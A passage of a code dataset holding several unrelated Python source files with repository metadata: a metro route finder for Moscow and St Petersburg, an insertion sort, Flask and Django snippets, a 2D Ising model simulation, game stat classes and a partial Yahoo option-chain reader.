застава10': [('Дубровка10', 'Римская10', 'Пролетарская7'), 1000, '', False],\r\n 'Римская10': [('Крестьянская застава10', 'Чкаловская10', 'Площадь Ильича8'), 1000, '', False],\r\n 'Чкаловская10': [('Римская10', 'Курская5', 'Сретенский бульвар10', 'Курская3'), 1000, '', False],\r\n 'Сретенский бульвар10': [('Чкаловская10', 'Трубная10', 'Чистые пруды1', 'Тургеневская6'), 1000, '', False],\r\n 'Трубная10': [('Сретенский бульвар10', 'Достоевская10', 'Цветной бульвар9'), 1000, '', False],\r\n 'Достоевская10': [('Трубная10', 'Марьина роща10'), 1000, '', False],\r\n 'Марьина роща10': [('Достоевская10', 'Бутырская10'), 1000, '', False],\r\n 'Бутырская10': [('Марьина роща10', 'Фонвизинская10'), 1000, '', False],\r\n 'Фонвизинская10': [('Бутырская10',), 1000, '', False],\r\n 'Котельники7': [('Жулебино7',), 1000, '', False],\r\n 'Жулебино7': [('Котельники7', 'Лермонтовский проспект7'), 1000, '', False],\r\n 'Лермонтовский проспект7': [('Жулебино7', 'Выхино7'), 1000, '', False],\r\n 'Выхино7': [('Лермонтовский проспект7', 'Рязанский проспект7'), 1000, '', False],\r\n 'Рязанский проспект7': [('Выхино7', 'Кузьминки7'), 1000, '', False],\r\n 'Кузьминки7': [('Рязанский проспект7', 'Текстильщики7'), 1000, '', False],\r\n 'Текстильщики7': [('Кузьминки7', 'Волгоградский проспект7'), 1000, '', False],\r\n 'Волгоградский проспект7': [('Текстильщики7', 'Пролетарская7'), 1000, '', False],\r\n 'Пролетарская7': [('Волгоградский проспект7', 'Таганская7', 'Крестьянская застава10'), 1000, '', False],\r\n 'Таганская7': [('Пролетарская7', 'Китай-город7', 'Таганская5'), 1000, '', False],\r\n 'Китай-город7': [('Таганская7', 'Китай-город6', 'Кузнецкий мост7'), 1000, '', False],\r\n 'Кузнецкий мост7': [('Китай-город7', 'Пушкинская7', 'Лубянка1'), 1000, '', False],\r\n 'Пушкинская7': [('Кузнецкий мост7', 'Баррикадная7', 'Тверская2', 'Чеховская9'), 1000, '', False],\r\n 'Баррикадная7': [('Пушкинская7', 'Улица 1905 года7', 'Краснопресненская5'), 1000, '', False],\r\n 'Улица 1905 года7': [('Баррикадная7', 'Беговая7'), 1000, '', False],\r\n 'Беговая7': [('Улица 1905 года7', 'Полежаевская7'), 1000, '', False],\r\n 'Полежаевская7': [('Беговая7', 'Октябрьское Поле7'), 1000, '', False],\r\n 'Октябрьское Поле7': [('Полежаевская7', 'Щукинская7'), 1000, '', False],\r\n 'Щукинская7': [('Октябрьское Поле7', 'Спартак7'), 1000, '', False],\r\n 'Спартак7': [('Щукинская7', 'Тушинская7'), 1000, '', False],\r\n 'Тушинская7': [('Спартак7', 'Сходненская7'), 1000, '', False],\r\n 'Сходненская7': [('Тушинская7', 'Планерная7'), 1000, '', False],\r\n 'Планерная7': [('Сходненская7', ), 1000, '', False],\r\n 'Новокосино8': [('Новогиреево8',), 1000, '', False],\r\n 'Новогиреево8': [('Новокосино8', 'Перово8'), 1000, '', False],\r\n 'Перово8': [('Новогиреево8', 'Шоссе энтузиастов8'), 1000, '', False],\r\n 'Шоссе энтузиастов8': [('Перово8', 'Авиамоторная8'), 1000, '', False],\r\n 'Авиамоторная8': [('Шоссе энтузиастов8', 'Площадь Ильича8'), 1000, '', False],\r\n 'Площадь Ильича8': [('Авиамоторная8', 'Марксистская8', 'Римская10'), 1000, '', False],\r\n 'Марксистская8': [('Площадь Ильича8', 'Третьяковская8', 'Таганская7', 'Таганская5'), 1000, '', False],\r\n 'Третьяковская8': [('Марксистская8', 'Новокузнецкая2', 'Третьяковская6'), 1000, '', False],\r\n 'Щелковская3': [('Первомайская3', ), 1000, '', False],\r\n 'Первомайская3': [('Щелковская3', 'Измайловская3'), 1000, '', False],\r\n 'Измайловская3': [('Первомайская3', 'Партизанская3'), 1000, '', False],\r\n 'Партизанская3': [('Измайловская3', 'Семеновская3'), 1000, '', False],\r\n 'Семеновская3': [('Партизанская3', 'Электрозаводская3'), 1000, '', False],\r\n 'Электрозаводская3': [('Семеновская3', 'Бауманская3'), 1000, '', False],\r\n 'Бауманская3': [('Электрозаводская3', 'Курская3'), 1000, '', False],\r\n 'Курская3': [('Бауманская3', 'Площадь революции3', 'Чкаловская10'), 1000, '', False],\r\n 'Площадь революции3': [('Курская3', 'Арбатская3', 'Театральная2', 'Охотный ряд1'), 1000, '', False],\r\n 'Арбатская3': [('Площадь революции3', 'Смоленская3', 'Библиотека имени Ленина1', 'Боровицкая9', 'Александровский сад4'), 1000, '', False],\r\n 'Смоленская3': [('Арбатская3', 'Киевская3'), 1000, '', False],\r\n 'Киевская3': [('Смоленская3', 'Парк победы3', 'Киевская5', 'Киевская4'), 1000, '', False],\r\n 'Парк победы3': [('Киевская3', 'Славянский бульвар3'), 1000, '', False],\r\n 'Славянский бульвар3': [('Парк победы3', 'Кунцевская3'), 1000, '', False],\r\n 'Кунцевская3': [('Славянский бульвар3', 'Молодежная3', 'Кунцевская4'), 1000, '', False],\r\n 'Молодежная3': [('Кунцевская3', 'Крылатское3'), 1000, '', False],\r\n 'Крылатское3': [('Молодежная3', 'Строгино3'), 1000, '', False],\r\n 'Строгино3': [('Крылатское3', 'Мякинино3'), 1000, '', False],\r\n 'Мякинино3': [('Строгино3', 'Волоколамская3'), 1000, '', False],\r\n 'Волоколамская3': [('Мякинино3', 'Митино3'), 1000, '', False],\r\n 'Митино3': [('Волоколамская3', 'Пятницкое шоссе3'), 1000, '', False],\r\n 'Пятницкое шоссе3': [('Митино3',), 1000, '', False],\r\n 'Александровский сад4': [('Арбатская4', 'Охотный ряд1', 'Боровицкая9', 'Арбатская3'), 1000, '', False],\r\n 'Арбатская4': [('Александровский сад4', 'Смоленская4'), 1000, '', False],\r\n 'Смоленская4': [('Арбатская4', 'Киевская4'), 1000, '', False],\r\n 'Киевская4': [('Смоленская4', 'Студенческая4', 'Киевская5', 'Киевская3'), 1000, '', False],\r\n 'Студенческая4': [('Киевская4', 'Кутузовская4'), 1000, '', False],\r\n 'Кутузовская4': [('Студенческая4', 'Фили4'), 1000, '', False],\r\n 'Фили4': [('Кутузовская4', 'Багратионовская4'), 1000, '', False],\r\n 'Багратионовская4': [('Фили4', 'Филевский парк4'), 1000, '', False],\r\n 'Филевский парк4': [('Багратионовская4', 'Пионерская4'), 1000, '', False],\r\n 'Пионерская4': [('Филевский парк4', 'Кунцевская4'), 1000, '', False],\r\n 'Кунцевская4': [('Пионерская4', 'Кунцевская4', 'Кунцевская3'), 1000, '', False],\r\n 'Каховская11': [('Варшавская11', 'Севастопольская9'), 1000, '', False],\r\n 'Варшавская11': [('Каховская11', 'Каширская11'), 1000, '', False],\r\n 'Каширская11': [('Варшавская11', 'Каширская2'), 1000, '', False]}\r\n\r\n\r\nmetroTMP1 = {'Проспект Ветеранов1': [('Ленинский проспект1',), 1000, '', False],\r\n 'Ленинский проспект1': [('Проспект Ветеранов1', 'Автово1'), 1000, '', False],\r\n 'Автово1': [('Ленинский проспект1', 'Кировский завод1'), 1000, '', False],\r\n 'Кировский завод1': [('Автово1', 'Нарвская1'), 1000, '', False],\r\n 'Нарвская1': [('Кировский завод1', 'Балтийская1'), 1000, '', False],\r\n 'Балтийская1': [('Нарвская1', 'Технологический институт1'), 1000, '', False],\r\n 'Технологический институт1': [('Балтийская1', 'Пушкинская1', 'Технологический институт2'), 1000, '', False],\r\n 'Пушкинская1': [('Технологический институт1', 'Владимирская1', 'Звенигородская5'), 1000, '', False],\r\n 'Владимирская1': [('Пушкинская1', 'Площадь Восстания1', 'Достоевская4'), 1000, '', False],\r\n 'Площадь Восстания1': [('Владимирская1', 'Чернышевская1', 'Маяковская3'), 1000, '', False],\r\n 'Чернышевская1': [('Площадь Восстания1', 'Площадь Ленина1'), 1000, '', False],\r\n 'Площадь Ленина1': [('Чернышевская1', 'Выборгская1'), 1000, '', False],\r\n 'Выборгская1': [('Площадь Ленина1', 'Лесная1'), 1000, '', False],\r\n 'Лесная1': [('Выборгская1', 'Площадь Мужества1'), 1000, '', False],\r\n 'Площадь Мужества1': [('Лесная1', 'Политехническая1'), 1000, '', False],\r\n 'Политехническая1': [('Площадь Мужества1', 'Академическая1'), 1000, '', False],\r\n 'Академическая1': [('Политехническая1', 'Гражданский проспект1'), 1000, '', False],\r\n 'Гражданский проспект1': [('Академическая1', 'Девяткино1'), 1000, '', False],\r\n 'Девяткино1': [('Гражданский проспект1',), 1000, '', False],\r\n 'Купчино2': [('Звездная2',), 1000, '', False],\r\n 'Звездная2': [('Купчино2', 'Московская2'), 1000, '', False],\r\n 'Московская2': [('Звездная2', 'Парк Победы2'), 1000, '', False],\r\n 'Парк Победы2': [('Московская2', 'Электросила2'), 1000, '', False],\r\n 'Электросила2': [('Парк Победы2', 'Московские ворота2'), 1000, '', False],\r\n 'Московские ворота2': [('Электросила2', 'Фрунзенская2'), 1000, '', False],\r\n 'Фрунзенская2': [('Московские ворота2', 'Технологический институт2'), 1000, '', False],\r\n 'Технологический институт2': [('Фрунзенская2', 'Сенная площадь2', 'Технологический институт1'), 1000, '', False],\r\n 'Сенная площадь2': [('Технологический институт2', 'Невский проспект2', 'Спасская4'), 1000, '', False],\r\n 'Невский проспект2': [('Сенная площадь2', 'Горьковская2', 'Гостиный двор3'), 1000, '', False],\r\n 'Горьковская2': [('Невский проспект2', 'Петроградская2'), 1000, '', False],\r\n 'Петроградская2': [('Горьковская2', 'Черная речка2'), 1000, '', False],\r\n 'Черная речка2': [('Петроградская2', 'Пионерская2'), 1000, '', False],\r\n 'Пионерская2': [('Черная речка2', 'Удельная2'), 1000, '', False],\r\n 'Удельная2': [('Пионерская2', 'Озерки2'), 1000, '', False],\r\n 'Озерки2': [('Удельная2', 'Проспект Просвещения2'), 1000, '', False],\r\n 'Проспект Просвещения2': [('Озерки2', 'Парнас2'), 1000, '', False],\r\n 'Парнас2': [('Проспект Просвещения2',), 1000, '', False],\r\n 'Международная5': [('Бухарестская5',), 1000, '', False],\r\n 'Бухарестская5': [('Международная5', 'Волковская5'), 1000, '', False],\r\n 'Волковская5': [('Бухарестская5', 'Обводный канал5'), 1000, '', False],\r\n 'Обводный канал5': [('Волковская5', 'Звенигородская5'), 1000, '', False],\r\n 'Звенигородская5': [('Обводный канал5', 'Садовая5', 'Пушкинская1'), 1000, '', False],\r\n 'Садовая5': [('Звенигородская5', 'Адмиралтейская5', 'Сенная площадь2', 'Спасская4'), 1000, '', False],\r\n 'Адмиралтейская5': [('Садовая5', 'Спортивная5'), 1000, '', False],\r\n 'Спортивная5': [('Адмиралтейская5', 'Чкаловская5'), 1000, '', False],\r\n 'Чкаловская5': [('Спортивная5', 'Крестовский остров5'), 1000, '', False],\r\n 'Крестовский остров5': [('Чкаловская5', 'Старая Деревня5'), 1000, '', False],\r\n 'Старая Деревня5': [('Крестовский остров5', 'Комендантский проспект5'), 1000, '', False],\r\n 'Комендантский проспект5': [('Старая Деревня5',), 1000, '', False],\r\n 'Рыбацкое3': [('Обухово3',), 1000, '', False],\r\n 'Обухово3': [('Рыбацкое3', 'Пролетарская3'), 1000, '', False],\r\n 'Пролетарская3': [('Обухово3', 'Ломоносовская3'), 1000, '', False],\r\n 'Ломоносовская3': [('Пролетарская3', 'Елизаровская3'), 1000, '', False],\r\n 'Елизаровская3': [('Ломоносовская3', 'Площадь Александра Невского3'), 1000, '', False],\r\n 'Площадь Александра Невского3': [('Елизаровская3', 'Маяковская3', 'Площадь Александра Невского4'), 1000, '', False],\r\n 'Маяковская3': [('Гостиный двор3', 'Площадь Александра Невского3', 'Площадь Восстания1'), 1000, '', False],\r\n 'Гостиный двор3': [('Площадь Александра Невского3', 'Василеостровская3', 'Невский проспект2'), 1000, '', False],\r\n 'Василеостровская3': [('Гостиный двор3', 'Приморская3'), 1000, '', False],\r\n 'Приморская3': [('Василеостровская3', ), 1000, '', False],\r\n 'Улица Дыбенко4': [('Проспект Большевиков4',), 1000, '', False],\r\n 'Проспект Большевиков4': [('Улица Дыбенко4', 'Ладожская4'), 1000, '', False],\r\n 'Ладожская4': [('Проспект Большевиков4', 'Новочеркасская4'), 1000, '', False],\r\n 'Новочеркасская4': [('Ладожская4', 'Площадь Александра Невского4'), 1000, '', False],\r\n 'Площадь Александра Невского4': [('Новочеркасская4', 'Лиговский проспект4', 'Площадь Александра Невского3'), 1000, '', False],\r\n 'Лиговский проспект4': [('Площадь Александра Невского4', 'Достоевская4'), 1000, '', False],\r\n 'Достоевская4': [('Лиговский проспект4', 'Спасская4', 'Владимирская1'), 1000, '', False],\r\n 'Спасская4': [('Сенная площадь2', 'Садовая5'), 1000, '', False]}\r\n\r\n\r\nbranchesMos = {'Сокольническая' : '1', 'Замоскворецкая' : '2', 'Арбатско-Покровская' : '3', 'Филёвская' : '4', 'Кольцевая' : '5', 'Калужско-Рижская' : '6',\r\n 'Таганско-Краснопрес��енская' : '7', 'Калининско-Солнцевской' : '8', 'Серпуховско-Тимирязевская' : '9', 'Люблинско-Дмитровская' : '10',\r\n 'Каховская' : '11'}\r\n\r\nbranchesSpb = {'Кировско-Выборгская' : '1', 'Московско-Петроградская' : '2', 'Невско-Василеостровская' : '3', 'Правобережная' : '4', 'Фрунзенско-Приморская' : '5'}\r\n\r\ndef findNumOfBranch(st, metroLst):\r\n branchNum = ''\r\n for i in metroLst:\r\n if i[:-1] == st:\r\n branchNum = i[-1:]\r\n elif i[:-2] == st:\r\n branchNum = i[-2:]\r\n\r\n return branchNum\r\n\r\ndef findWay(yourStation, bankStation, city):\r\n global metroTMP, metroBranch, branchesSpb, metroTMP1\r\n metroBranch = {}\r\n metroMap = {}\r\n\r\n if city == 0:\r\n metroBranch = branchesMos\r\n metroMap = metroTMP\r\n else:\r\n metroBranch = branchesSpb\r\n metroMap = metroTMP1\r\n\r\n count = len(metroMap)\r\n\r\n\r\n for i in metroMap.keys():\r\n metroMap[i][1] = 1000\r\n metroMap[i][2] = ''\r\n metroMap[i][3] = False\r\n metroLst = list(metroMap)\r\n\r\n if yourStation[-1] != ')':\r\n yourStation += findNumOfBranch(yourStation, metroLst)\r\n else:\r\n r1 = re.findall('[(](.*)[)]', yourStation)\r\n branch = metroBranch[r1[0]]\r\n r2 = re.findall('(.+)[ ]', yourStation)\r\n yourStation = r2[0] + branch\r\n\r\n if bankStation[-1] != ')':\r\n bankStation += findNumOfBranch(bankStation, metroLst)\r\n else:\r\n r1 = re.findall('[(](.*)[)]', bankStation)\r\n branch = metroBranch[r1[0]]\r\n r2 = re.findall('(.+)[ ]', bankStation)\r\n bankStation = r2[0] + branch\r\n\r\n bankStation += findNumOfBranch(bankStation, metroLst)\r\n\r\n #print(yourStation, bankStation)\r\n\r\n st = metroMap.get(yourStation)\r\n\r\n if not st:\r\n return None, None\r\n else:\r\n st[1] = 0\r\n for i in st[0]:\r\n temp = metroMap.get(i)\r\n temp[1] = 1\r\n temp[2] = yourStation\r\n st[2] = yourStation\r\n st[3] = True\r\n count -= 1\r\n\r\n while count > 0:\r\n for i in metroMap.keys():\r\n st = metroMap[i]\r\n if st[1] != 1000 and st[3] != True:\r\n weight = st[1]\r\n for j in st[0]:\r\n if metroMap[j][1] >= (weight + 1):\r\n metroMap[j][1] = (weight + 1)\r\n metroMap[j][2] = i\r\n metroMap[i][3] = True\r\n if count <= 0:\r\n break\r\n count -= 1\r\n\r\n # wayList = []\r\n # wayList.append(bankStation)\r\n # curSt = metroMap[bankStation][2]\r\n # while curSt != yourStation:\r\n # wayList.append(curSt)\r\n # curSt = metroMap[curSt][2]\r\n\r\n\r\n return metroMap[bankStation][1]\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"grivis/Python-Web-Projects","sub_path":"metroFind_more_Class.py","file_name":"metroFind_more_Class.py","file_ext":"py","file_size_in_byte":36249,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74337695413","text":"def insertionsort(A):\n n = len(A)\n for i in range(1,n):\n cvalue = A[i]\n postion = i\n while postion > 0 and A[postion - 1] > cvalue:\n A[postion] = A[postion-1]\n postion = postion - 1\n\n A[postion] = cvalue\n\nA = [3, 5, 8, 9, 6, 2]\nprint(\"Orginal Array: \",A)\ninsertionsort(A)\nprint(\"Sorted Array: \",A)\n\n\n\n","repo_name":"Abinash2555/Data-Structure-And-Algorithm-With-Python","sub_path":"Sorting/insertionsort.py","file_name":"insertionsort.py","file_ext":"py","file_size_in_byte":357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14325181137","text":"from flask import render_template\n\ndef dealing(result):\n trehold = 0.002\n result.sort(key=lambda tup : tup[1])\n result.reverse()\n #print result\n return [ (name,rate,points) for name,rate,points in result if rate > trehold]\n\ndef renderImage(result):\n hostname = \"http://127.0.0.1:8888/static/\"\n temp = [{ \"url\" : hostname + name , \"name\" :\n name,\"rank\":rate,\"points\":points } for name,rate,points in result]\n return render_template(\"result.html\",images = temp)\n \n","repo_name":"lanstonpeng/imageSearch","sub_path":"core/manipulator.py","file_name":"manipulator.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"21"} +{"seq_id":"75015353333","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu May 31 14:29:17 2018\n\n@author: Chao Wan\n\"\"\"\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nneq = pow(10,4)\nnsteps = pow(10,5)\nL = 3\n\ndef init_state(L):\n psi0 = np.zeros((L+1)*(L+1))\n psi0 = psi0.reshape(L+1,L+1)\n psi0 = np.mat(psi0) \n for i in range(L):\n for j in range(L):\n list = [-1,1]\n psi0[i,j] = np.random.choice(list)\n for i in range(L+1):\n psi0[L,i] = psi0[0,i]\n psi0[i,L] = psi0[i,0]\n return psi0\n\ndef magnetization(state):\n sum = 0.\n m = 0.\n for i in range(L):\n for j in range(L):\n sum += state[i,j]\n m = sum/pow(L,2)\n return m\n\ndef energy(state):\n E = 0.\n for i in range(L):\n for j in range(L):\n E += (-1)*state[i,j]*state[i+1,j]+(-1)*state[i,j]*state[i,j+1]\n return E/pow(L,2)\n\ndef mcstep(state, temp):\n newstate = state\n list = range(L)\n rand = 0.\n i = np.random.choice(list)\n j = np.random.choice(list)\n newstate[i,j] *= -1\n for i in range(L):\n newstate[L,i] = newstate[0,i]\n newstate[i,L] = newstate[i,0]\n deltaE = energy(newstate)-energy(state)\n if deltaE < 0:\n state = newstate\n else:\n rand = random.uniform(0,1)\n if rand < np.exp(-deltaE/temp):\n state = newstate\n return state\n\n\nif __name__=='__main__':\n '''set up initial configuration'''\n conf = init_state(L)\n '''number of steps to equilibrate the initial configuration'''\n\n '''Sample temperature between 4 and 1'''\n \n '''define lists to sample thermodynamic quantities for different temperatures'''\n Tn = []\n for i in range(25):\n Tn.append(1+0.12*i)\n print(Tn)\n \n j = 0\n ener = []\n magn = []\n for i in range(nsteps):\n conf = mcstep(conf, 2)\n if i == neq:\n print(conf)\n if i > neq:\n if np.mod(i,100) == 0:\n ener.append(energy(conf))\n magn.append(magnetization(conf))\n print(ener)\n print(magn)\n \n plt.subplot(211)\n plt.plot(range(len(magn)),magn,'b',label = 'magnetization')\n plt.plot(range(len(ener)),ener,'r', label = 'energy')\n plt.show()\n \n meanm = []\n meane = []\n cv = []\n chi = []\n for T in Tn:\n ener = []\n magn = []\n for i in range(nsteps):\n conf = mcstep(conf,T)\n if i > neq:\n if np.mod(i,100) == 0:\n ener.append(energy(conf))\n magn.append(magnetization(conf))\n cv.append(np.var(ener))\n meanm.append(np.mean(magn))\n meane.append(np.mean(ener))\n chi.append(np.var(magn))\n \n print(meane)\n print(meanm)\n print(chi)\n print(cv)\n \n plt.plot(Tn,meane,'b',Tn,meanm,'r',Tn,cv,'g',Tn,chi,'pink')\n plt.show()\n \n\n","repo_name":"OetkerZ/gitforhomework","sub_path":"ASP/T5/Chao-2d-ising.py","file_name":"Chao-2d-ising.py","file_ext":"py","file_size_in_byte":2864,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73539983093","text":"######################################\n# Import and initialize the librarys #\n######################################\nfrom random import randint\nfrom code.api.core import os, log, screens, coreFunc, PgEss\nfrom code.api.events import gameEvent\nfrom code.api.actions import Runclass\n\n\n#################\n# Setup logging #\n#################\nfilename = os.path.basename(__file__).split('.')[0]\nlogger = log.get_logger(filename)\n\n\n##################\n# Gameplay logic #\n##################\nclass Stats(coreFunc):\n def __init__(self, day:int = None, damage:list = None, defence:int = None, health:list = None, elixir:int = None):\n self.day = day\n self.damage = damage\n self.defence = defence\n self.health = health\n self.elixir = elixir\n\n def isFullHealth(self):\n if self.health == None: return\n return self.health[0] >= self.health[1]\n\n def multiply(self, multiplier:int):\n for name, value in self.__dict__.items():\n if value != None:\n if type(value) == list: \n for i in range(len(value)): value[i] = int(value[i] * multiplier)\n else:\n value = int(value * multiplier)\n\n setattr(self, name, value)\n\n def calDamage(self, defence:int = 0):\n if self.damage != None: return max(0, randint(*self.damage) - defence)\n\n def addBonus(self, bonus, item, withDisplay:bool = False, animate = None):\n for name, by in bonus.__dict__.items():\n if by != None: self.update(name, by, item, withDisplay, animate)\n\n def update(self, name:str, by, item, withDisplay:bool = False, animate = None):\n # For damage\n if name == 'damage':\n self.damage[0] += by[0]\n self.damage[1] += by[1]\n\n # For health\n elif name == 'health':\n self.health[0] = max(0, self.health[0] + by[0])\n self.health[1] += by[1]\n\n # The rest\n else: \n setattr(self, name, getattr(self, name) + by)\n\n # Check for change orb day\n if name == 'day': gameEvent.orb_change.call()\n\n # Display change\n if animate == None: self.display(name, item, withDisplay)\n \n # If animate instead\n else: \n # Add stats animation to queue\n gameEvent.stats.addQueue(\n Runclass(run=self.animate, parameters={'name': name, 'by': by, 'item': item, 'animate': animate})\n )\n\n def animate(self, counter:int, name:str, by, item, animate):\n if counter == 0:\n # Generate the text to display\n if type(by) == list: \n if by[1] != 0: text = by[1]\n else: text = by[0]\n else: text = by\n\n # Adding polarity sign (+/-)\n if text <= 0: text = '- {}'.format(abs(text))\n else: text = '+ {}'.format(text)\n\n # Set text colour to represent the stats type\n if name == 'damage': animate.stats.format.colour = PgEss.colour.red\n elif name == 'defence': animate.stats.format.colour = PgEss.colour.blue\n elif name == 'health': animate.stats.format.colour = PgEss.colour.green\n elif name == 'elixir': animate.stats.format.colour = PgEss.colour.purple\n else: animate.stats.format.colour = PgEss.colour.white\n\n animate.stats.setText(text, withDisplay=False)\n\n # Pop out\n elif counter <= 30:\n animate.stats.format.modifyFont(fontSize=counter*2)\n animate.display(withData='all')\n\n # Pop back abit\n elif counter <= 34:\n animate.stats.format.modifyFont(fontSize=60-(counter-31)*2)\n animate.display(withData='all')\n\n # Show the updated stats\n elif counter == 35: self.display(name, item, True)\n\n # Pop out\n elif 100 < counter <= 126: \n animate.stats.format.modifyFont(fontSize=52-(counter-100)*2)\n animate.display(withData='all')\n\n # Animation ended \n elif counter > 126: \n animate.stats.setText('')\n return True\n\n def set(self, name:str, to, item, withDisplay:bool = False):\n # Set the new stats\n setattr(self, name, to)\n self.display(name, item, withDisplay)\n \n def display(self, name:str, item, withDisplay:bool = False):\n # Generate the text\n if name == 'damage': text = str('{} - {}'.format(*self.damage))\n elif name == 'health': text = str('{}/{}'.format(*self.health))\n else: text = str('{}'.format(getattr(self, name)))\n\n # Display to stats screen\n item[name].setText(text, withDisplay=withDisplay)\n\n\nclass Bonus(coreFunc):\n def __init__(self, damage:list = None, defence:int = None, health:list = None, elixir:int = None):\n self.damage = damage\n self.defence = defence\n self.health = health\n self.elixir = elixir\n\n def set(self, name:str, to, item, withDisplay:bool = False, index:int = 1):\n # Set the new stats\n setattr(self, name, to)\n self.display(name, item, withDisplay, index)\n\n def display(self, name:str, item = None, withDisplay:bool = False, index:int = 1):\n stats = getattr(self, name)\n # Generate teh text to display\n if type(stats) == list: text = str('+ {}'.format(stats[index]))\n else: text = str('+ {}'.format(stats))\n\n # Display to stats screen\n item[name].setText(text, withDisplay=withDisplay)\n\n\nclass Location(coreFunc):\n def __init__(self, row, column):\n self.row = row\n self.column = column\n\n def pos(self): return (self.row, self.column)\n\n def setNew(self, pos:tuple):\n self.row = pos[0]\n self.column = pos[1]\n\n\nclass Weapon(coreFunc):\n def __init__(self, weapons:list = None):\n self.weapons = []\n\n # Reset weapon grid\n screens.game.info.hero.weapons.generate()\n \n # Set weapons to display in grid\n if weapons != None: \n for weapon in weapons: self.add(weapon, False)\n \n screens.game.info.load(withItems=['hero'], refresh=True)\n\n def have(self, weapon:str): return weapon in self.weapons\n\n def add(self, weapon:str, withLoad:bool = True): \n # Add to weapon list\n self.weapons.append(weapon)\n\n # Add to gui grid\n number_of_weapons = len(self.weapons)\n row = number_of_weapons // 2\n column = number_of_weapons % 2\n\n screens.game.info.hero.weapons.tiles[row][column].sprites.append(weapon)\n if withLoad: screens.game.info.load(withItems=['hero'], refresh=True)","repo_name":"benwoo1110/Ratventure","sub_path":"python/code/logic/stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":6637,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"27484185090","text":"from rest_framework import serializers\nfrom .models import Order, Product\nfrom drf_writable_nested.serializers import WritableNestedModelSerializer\n\nclass ProductSerializer(serializers.ModelSerializer):\n class Meta:\n model = Product\n fields = \"__all__\"\n\nclass OrderSerializer(WritableNestedModelSerializer):\n Product=ProductSerializer(many=True)\n\n class Meta:\n model = Order\n fields = ['id', 'Date', 'Product']\n\nclass StatsSerializer(serializers.Serializer):\n month = serializers.DateField(format='%Y %b')\n value = serializers.IntegerField()","repo_name":"Bartoshav/Online_store_test_task","sub_path":"online_store/store_api/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"39659307922","text":"\"\"\"\nCreated on Tuesday May 26 2020\n\n@author: Jeffrey J. Walker\n\n yahoo_option_chain_multi_exp.py\n This function obtains the option chain for multiple expiration dates.\n\n\t\tIs it possible to obtain the performance of the underlying for the \n\t\tprevious year? (in order to find the historical volatility if I want\n\t\tto make my own iv calculations)\n\n\tInputs:\n\t\tpath\t\t- \tthe target directory, where the option chain will be \n\t\t\t\t\t\twritten. args or kwargs for write to file flag?\n\t\t\t\t\t\tShould there be a default path if none given?\n\t\tticker\t\t-\tthe ticker symbol.\n\t\t\t\t\t\tStocks are just the letters\t\n\t\t\t\t\t\tIndices include '^' in front of the letters.\t\n\t\tinput_date\t- \tuser inputs a date? If not given, use the nearest \n\t\t\t\t\t\texpiry date? Should this be unix or datetime format?\n\t\t\t\t\t\tRight now I use unix time format, but maybe do a check\n\t\t\t\t\t\tand convert to unix format if input_date is not in\n\t\t\t\t\t\tunix format.\n\t\t\t\t\t\tCan I make this function accept multiple input dates?\n\t\t\t\t\t\tGet closest expiry date to each one in list or \n\t\t\t\t\t\tdatetime array\n\n\tOutputs:\n\n\"\"\"\n\nimport pandas as pd\nimport numpy as np\nfrom datetime import datetime\nfrom datetime import date\nfrom datetime import timedelta\nfrom dateutil.tz import *\nimport time\nimport os\nimport sys\nimport json\n\n## Make optional arguments: write_path, read_path;\n#(path,ticker,scrape=True)\n## include path and ticker; \n## if optional scrape variable set to False, then treat path as a file to \n## read from instead of write to, test that the path can be opened (try bock),\n## and ticker must still be specified, but is just a dummy in such a case \ndef yahoo_option_chain_multi_exp(input_path,ticker,scrape=True):\n\t\n\t## the time zone where the code is run, possible check your location to \n\t## obtain. Could possibly use as an input, but it might be nice to check\n\t## the device's location to obtain automatically with this function\n timezone='CET'\n\t## target directory? Currently an input to the function, but maybe have \n\t## some default if this is not specified by the user.\n\t#target_dir='/home/jjwalker/Desktop/finance/data/options'\n target_dir=input_path\n\t\n\t## If the optional scrape flag has False selected, then read from file\n\t## (input_path must contain a properly formated option chain.)\n if scrape==False:\n try:\n\t\t\t## Here is how to open it back up again.\n\t\t\t#bs_json=pd.io.json.read_json(input_path)\n bs_json=pd.read_json(input_path)\n\t\t\t\n\t\t\t#pframes=[pd.DataFrame(\n\t\t\t#\tchain['optionChain']['result'][0]['options'][0]['puts']) \n\t\t\t#\tfor chain in bs_json[0].iloc[:]]\n\t\t\t#cframes=[pd.DataFrame(\n\t\t\t#\tchain['optionChain']['result'][0]['options'][0]['calls']) \n\t\t\t#\tfor chain in bs_json[0].iloc[:]]\n pframes=[pd.DataFrame(chain[0]['options'][0]['puts']) \n for chain in bs_json[1][:]]\n cframes=[pd.DataFrame(chain[0]['options'][0]['calls'] )\n for chain in bs_json[1][:]]\n \n df_puts=pd.concat(pframes)\n df_calls=pd.concat(cframes)\n\t\t\t## merge on strike:\n df=df_calls.merge(df_puts,how='outer',on=['expiration','strike'],suffixes=('_c','_p'))\n\t\t\t#df.expiration=df.expiration.apply(lambda d: datetime.utcfromtimestamp(d))\t\n\t\t\t#df.lastTradeDate_c=df.lastTradeDate_c.apply(lambda d: datetime.utcfromtimestamp(d))\n\t\t\t#df.lastTradeDate_p=df.lastTradeDate_p.apply(lambda d: datetime.utcfromtimestamp(d))\n\t\t\t#df.set_index(['expiration','strike'],inplace=True)\n\t\t\t#df=df.reindex(pd.MultiIndex.from_product(\n\t\t\t#\t[df.index.levels[0],df.index.levels[1].unique()],\n\t\t\t#\tnames=['expiration','strike']),fill_value=np.NaN)\t\n\t\t\n\t\t\t## Need expiry dates as an output\n\t\t\t#expiry_dates=bs_json[0].iloc[0]['optionChain']['result'][0]['expirationDates']\n 